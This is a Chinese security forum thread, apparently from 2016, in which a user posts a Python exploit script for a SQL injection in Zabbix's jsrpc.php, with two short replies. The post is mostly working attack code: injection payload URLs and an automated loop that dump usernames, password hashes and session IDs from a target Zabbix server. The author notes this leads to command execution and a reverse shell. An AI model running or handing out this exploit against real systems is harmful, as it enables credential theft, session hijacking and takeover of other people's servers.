请选择 进入手机版 | 继续访问电脑版
查看: 2738|回复: 2

[漏洞] zabbix注入利用脚本

[复制链接]
  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2016-8-18 18:11:17 | 显示全部楼层 |阅读模式
    本帖最后由 wuyan 于 2016-8-18 19:27 编辑

    没什么好讲的,分析的文章页不想写了,就是insert注入。

    [Python] 纯文本查看 复制代码
    #/usr/bin/python
    #*-*coding=utf-8*-*
    import requests
    import re
    import sys
    '''
    ===getpass payloads===
    1./jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit 1,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1
    2./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
    ===session 获取===
    1./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,sessionid,0x7e))+from+sessions+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
    '''
    
    def getpass(url,num):
    	payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&\
    	hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
    		(rand(0)*2), (select concat(0x7e,0x7e,alias,0x3a,passwd,0x7e,0x7e) from users limit %s,1))x from information_schema.character_sets \
    group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=\
    showlatest&filter=&filter_task=&mark_color=1' % str(num)
    	tempurl = url + payloads
    	response = req = requests.get(tempurl).content
    	return response
    
    def filter(content):
    	try:
    		result = re.findall(r"~~(.*?)~~",content)[0]
    		print result
    		return True
    	except Exception, e:
    		return False
    
    def getsession(url,num):
    	payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&\
    	hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
    		(rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
    group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=\
    showlatest&filter=&filter_task=&mark_color=1' % str(num)
    	tempurl = url + payloads
    	response = req = requests.get(tempurl).content
    	return response
    
    def usage():
        print "   usage1: 	 python zabbix.py xxx.com passwd"
        print "   usage2:	 python zabbix.py xxx.com session\n"
    if __name__ == '__main__':
    	logo = '''\n
    	 _____     _     _     _      _____           _    
    	|__  /__ _| |__ | |__ (_)_  _|  ___|   _  ___| | __
    	  / // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
    	 / /| (_| | |_) | |_) | |>  <|  _|| |_| | (__|   < 
    	/____\__,_|_.__/|_.__/|_/_/\_\_|   \__,_|\___|_|\_\
    	
    	\n  **************coded by bsmali4 2016-8-16*****************
    	'''
    	print logo
    	if len(sys.argv) != 3:
    		usage()
    	else:
    		host = sys.argv[1].strip('/')
    		method = sys.argv[2]
    		if method == 'passwd':
    			for i in range (0,999):
    				response = getpass(host,i)
    				if not filter(response):
    					break
    		elif method == 'session':
    			for i in range(0,999):
    				response = getsession(host,i)
    				if not filter(response):
    					break
    	
    
    

    登陆后台后可以直接执行命令,反弹shell什么的是极好的

    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-1-16 20:03
  • 签到天数: 116 天

    [LV.6]常住居民II

    发表于 2016-8-19 14:21:57 | 显示全部楼层
    这样真的好么,信不信我也直接丢个汇编代码然后说没啥好写的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-9-24 17:13
  • 签到天数: 187 天

    [LV.7]常住居民III

    发表于 2016-8-20 09:59:52 | 显示全部楼层
    卧槽,居然没人来捧场。
    回复 支持 反对

    使用道具 举报

    高级模式
    B Color Image Link Quote Code Smilies |上传

    本版积分规则

    快速回复 返回顶部 返回列表